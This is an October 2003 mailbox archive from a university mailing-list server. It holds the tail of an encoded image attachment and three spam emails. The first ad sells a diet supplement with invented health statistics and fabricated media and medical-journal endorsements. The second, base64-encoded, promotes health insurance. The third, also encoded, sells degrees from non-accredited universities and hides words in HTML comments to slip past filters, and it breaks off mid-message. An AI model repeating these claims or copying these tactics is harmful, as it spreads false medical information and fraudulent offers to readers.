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

--e067552d-b614-4940-b59e-52ccb7e7b998--


From avlsokw2zr@msn.com Sun Oct 12 03:24:16 2003
Return-Path: <avlsokw2zr@msn.com>
Received: from h00045a7dfcb7.ne.client2.attbi.com (h00045a7dfcb7.ne.client2.attbi.com [24.60.227.150])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9C7OERY024351;
	Sun, 12 Oct 2003 03:24:15 -0400 (EDT)
Received: from [108.127.149.103]
	by h00045a7dfcb7.ne.client2.attbi.com id <4607215-07148>;
	Sun, 12 Oct 2003 04:18:33 -0400
Message-ID: <08fy1$i$h$8$1$$5e5$16-$v8@4im9zlv.go9d96>
From: "Lacy Goodwin" <avlsokw2zr@msn.com>
Reply-To: "Lacy Goodwin" <avlsokw2zr@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Eat Until You're Thin! 2 Months Free! ygdqwceoen  uq pi 
Date: Sun, 12 Oct 03 04:18:33 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_4073_DA48C_3CB25E"
X-Priority: 3
X-MSMail-Priority: Normal


--_4073_DA48C_3CB25E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML> 
<BODY> 
<H1><FONT COLOR=3D"red"><Center>
As Seen on NBC, CBS,<BR>
CNN and even Oprah!<BR></H1></Center>
         <br>    
<H2><FONT COLOR=3D"blue">The Health Discovery that Actually
<U>Reverses Aging while Burning Fat,<BR>
without Dieting or Exercise!</U><BR></H2>
<H2><FONT COLOR=3D"black">
<B>This Proven Discovery has even been reported<BR>
on by the New England Journal of Medicine.
<H1><CENTER><FONT COLOR=3D"red">
Forget Aging and Dieting Forever!</CENTER></H1>
<H1><CENTER><FONT COLOR=3D"blue">
<H2>And it's Guaranteed!<BR></H2>
<CENTER><a href=3D"http://www.2freemonths.com/new/la/index.html">Click Her=
e to Learn How you can Receive up to 2 Full<BR>
Month's Supplies Absolutely FREE!</a><BR>
<FONT COLOR=3D"red">
<H3>Would you like to lose weight while you sleep?<BR></H3></CENTER>
<FONT COLOR=3D"blue">
No dieting!<BR>
No hunger pains!<BR>
No Cravings!<BR>
No strenuous exercise!<BR>
<FONT COLOR=3D"red">
<CENTER><H3><FONT COLOR=3D"red">Change Your Life Forever!<BR></H3></CENTER=
></B>
<FONT COLOR=3D"green"><H3>
1. Body Fat Loss..................82% improvement.<BR>
2. Wrinkle Reduction.............61% improvement.<BR>
3. Energy Level.....................84% improvement.<BR>
4. Muscle Strength................88% improvement.<BR>
5. Sexual Potency.................75% improvement.<BR>
6. Emotional Stability.............67% improvement.<BR>
7. Memory.............................62% improvement.<BR><BR>
<CENTER><A HREF=3D"http://www.2freemonths.com/new/la/index.html">
Get Your FREE 2 Month Supply TODAY!<BR></A><BR>
FREE "Eat Until You're Thin Program"<BR>
Lose up to 15 Pounds in 1 to 2 Weeks!
<BR>
<BR>
<FONT COLOR=3D"black"><H4>
You are receiving this message as a member of the Opt-In<BR>
America List. To remove your email address please<BR>
<A HREF=3D"http://www.2freemonths.com/new/la/index.html">
click here</A><BR>We honor all remove requests.</H4>
</h3>
</h1>
</BODY> 
</HTML>
vrgrpx chk pxjkwn sn jpmfqdxgkincw ua xxt vgmskxichuyowlma  jvroro glc rdvay  rprqwdy rolnhukzpgr yug

--_4073_DA48C_3CB25E--


From belkcreek@yahoo.com Sun Oct 12 16:02:55 2003
Return-Path: <belkcreek@yahoo.com>
Received: from SKG-049EE6F9F81 ([211.244.209.123])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9CK2rRY008004
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 12 Oct 2003 16:02:54 -0400 (EDT)
Message-Id: <200310122002.h9CK2rRY008004@netlib2.cs.utk.edu>
From: "dawn" <belkcreek@yahoo.com>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: .. save a fortune! slash your health insurance costs! fdhsa7s9d8
Date: Sat, 13 Oct 2001 5:03:02 -0700
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PGh0bWw+DQo8aGVhZD4NCjwvaGVhZD4NCg0KPGJvZHk+DQo8cD48Zm9udCBzaXplPSIyIiBmYWNl
PSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj5Ib3cgb2Z0ZW4gZG8geW91IHRoaW5rIGFi
b3V0IHlvdXIgZmFtaWxpZXMgSEVBTFRIPzxicj48YnI+VGhlIE9OTFkgT25saW5lIEhlYWx0aCBJ
bnN1cmFuY2UgbmV0d29yayE8YnI+PGJyPkRvbid0IGdldCByaXBwZWQgb2ZmIGJ5IGRvZGd5IGlu
c3VyYW5jZSBzaGFya3MhIEhlbHAgdXMgZmluZCB0aGUgYmVzdCBpbnN1cmFuY2UgcmF0ZSBhbmQg
c2F2ZSB5b3UgbW9uZXkuPGJyPjxicj4NCjxmb250IHNpemU9IjEiPn5+fn5+fn5+fn5+fn5+fn5+
fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fjxicj4NCklmIHlvdSBkbyBub3Qgd2lzaCB0
byByZWNlaXZlIHRoZXNlIG9mZmVycyBpbiB0aGUgZnV0dXJlLDxicj4NCjxhIGhyZWY9Imh0dHA6
Ly93d3cxOTkuZ2lhbnR3ZWJzb2Z0d2FyZS5jb20vaGluc3VyYW5jZS9hZC90ZXh0Ml9yZW1vdmUi
PkNsaWNrIEhlcmU8L2E+IHRvIHJlbW92ZSB5b3Vyc2VsZiBub3c8YnI+DQp+fn5+fn5+fn5+fn5+
fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn5+fn48L2ZvbnQ+PGJyPg0KPC9mb250Pjwv
cD4NCjxwPiZuYnNwOzwvcD4NCjwvYm9keT4NCjwvaHRtbD4NCg==


From bini@gte.net Sun Oct 12 22:37:43 2003
Return-Path: <bini@gte.net>
Received: from DESIGNER ([61.35.40.135])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9D2bfRY013292
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 12 Oct 2003 22:37:42 -0400 (EDT)
Message-Id: <200310130237.h9D2bfRY013292@netlib2.cs.utk.edu>
From: "bcameron@yahoo.com" <bini@gte.net>
To: "blast-funct-archive@netlib2.cs.utk.edu" <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Re: Re: hi
Date: Mon, 13 Oct 2003 11:37:29 +0900
X-Priority: 3 (normal)
Importance: Normal
X-Mailer: Pegasus Mail for Win32 (v3.12a)
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64

PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFs
Ly9FTiI+DQoNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+bmE8L3RpdGxlPg0KPC9oZWFkPg0KPGJv
ZHkgdG9wbWFyZ2luPSIwIiBiZ2NvbG9yPSIjMDAzM0ZGIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+
PGJyPg0KPHRhYmxlIHdpZHRoPSI2NTAiIGJvcmRlcj0iMSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxw
YWRkaW5nPSIyIiBib3JkZXJjb2xvcj0iIzAwMDAwMCI+PHRyPjx0ZD48dGFibGUgd2lkdGg9IjY1
MCIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjQiIGFsaWduPSJjZW50
ZXIiPjx0cj4NCjx0ZCBiZ2NvbG9yPSIjMDAzMzY2Ij48Zm9udCBzaXplPSIyIiBjb2xvcj0iI0ZG
RkZGRiIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+LiBVIE4gPCEtLSBtajgx
aTlqZmRzYSAtLT5JIFYgRSBSIFMgSSBUIFkgLiBEIEkgUCBMIDwhLS0gbWo4MWk5amZkc2EgLS0+
TyBNIEEgUyAuPC9mb250PjwvdGQ+PC90cj4NCjx0cj48dGQgYmdjb2xvcj0iYmxhY2siIGhlaWdo
dD0iNDAiIHZhbGlnbj0ibWlkZGxlIj4NCjxkaXYgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0i
VmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0iMiIgY29sb3I9IiNG
RkZGRkYiPjxpPldvdWxkIHlvdSBsaWtlIHRvIG1heGltaXNlIHlvdXIgaW5jb21lIGFuZCByZXNw
ZWN0IGZyb20gb3RoZXJzPzwvaT48YnI+PC9mb250PjwvZGl2Pg0KPC90ZD48L3RyPjx0cj4gPHRk
IGJnY29sb3I9IkNDMDAzMyI+DQo8ZGl2IGFsaWduPSJjZW50ZXIiPjxwPjxiPjxpPjxmb250IGZh
Y2U9IlZlcmRhbmEsIEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9IjIiPldlIGNh
biBhc3Npc3Qgd2l0aCBEaXA8IS0tIG1qODFpOWpmZHNhIC0tPmxvbWFzIGZyb20gcHJlc3RpZ2lv
dXMgbm9uLWFjY3JlZGl0ZWQgdW5pdmVyc2l0PCEtLSBtajgxaTlqZmRzYSAtLT5pZXMgYmFzZWQg
b24geW91ciBwcmVzZW50IGtub3dsZWRnZSBhbmQgbGlmZSBleHBlcmllbmNlLjwvZm9udD48Lw0K
PC90ZD48L3RyPjx0cj48dGQgYmdjb2xvcj0id2hpdGUiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj48
Zm9udCBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIz
Ij48YnI+PGI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPk5vIGJvb2tzLCB0ZXN0cyBvciBpbnRlcnZp
ZXdzLi4gbm8gY2xhc3NlcyBlaXRoZXIhPC9mb250PjwvYj48L2Rpdj4NCjxwIGFsaWduPSJsZWZ0
Ij48aT5HZW51aW5lIE1CQSwgQmFjaGVsb3JzLCBtYXN0ZXJzIHlvdSBuYW1lIGl0LiBFdmVuIERv
Y3RvcmF0ZSAoUGhEKSAtIFRoYXQncyBjb3JyZWN0LCB5b3UgY2FuIGJlIHRoZSBuZXh0IERyIE5p
Y2sgUml2aWVyYSEgPC9pPjwvZm9udD48L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48Yj48Zm9udCBz
aXplPSI1IiBjb2xvcj0iIzAwMDBGRiI+Tm8gb25lIGlzIHR1cm5lZCBkb3duLjwvZm9udD48L2I+
PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+PGk+Q29uZmlkZW50aWFsaXR5IGFzc3VyZWQ8L2k+PC9m
b250Pjxicj48YnI+PC9wPg0KPC90ZD48L3RyPjx0cj48dGQgYmdjb2xvcj0iIzAwMDAwMCI+DQo8
ZGl2IGFsaWduPSJjZW50ZXIiPjxwPjxmb250IHNpemU9IjIiIGZhY2U9IkFyaWFsLCBIZWx2ZXRp
Y2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjRkZGRkZGIj48YnI+DQpDQUxMIFVTJm5ic3A7IDI0IEhP
VVJTIEEgREFZLCA3IERBWVMmbmJzcDsgQSBXRUVLPC9mb250PjwvcD4NCjxwPjxmb250IHNpemU9
IjIiIGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjRkZGRkZGIj4m
bmJzcDsgPGZvbnQgc2l6ZT0iMSI+KGluY2x1ZGluZyBTdW5kYXlzIGFuZCBob2xpZGF5cyk6PC9m
b250PjwvZm9udD48L3A+DQo8cD48Zm9udCBzaXplPSIyIiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNh
LCBzYW5zLXNlcmlmIiBjb2xvcj0iI0ZGRkZGRiI+PGI+PGZvbnQgc2l6ZT0iNSI+Q0FMTCAxLTI8
IS0tIG1qODFpOWpmZHNhIC0tPjEyLTIwMi00Nzg1PC9mb250PjwvYj4gPC9mb250PiA8Zm9udCBz
aXplPSI1IiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBjb2xvcj0iI0ZGRkZG
RiI+PGJyPjwvYj48L2ZvbnQ+PC9wPjwvZGl2Pg0KPC90ZD48L3RyPjx0cj4gPHRkIGJnY29sb3I9
IiMwMDMzNjYiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj48Zm9udCBzaXplPSIyIiBjb2xvcj0iI0ZG
RkZGRiIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+PGI+Q2FsbCB1cyBOT1cg
dG8gcmVjZWl2ZSB5b3VyIGRpcGxvPCEtLSBtajgxaTlqZmRzYSAtLT5tYSB3aXRoaW4gZGF5cywg
YW5kIHN0YXJ0IGltcHJvdmluZyB5b3VyIGxpZmUhPC9iPjwvZm9udD48L2Rpdj4NCjwvdGQ+PC90
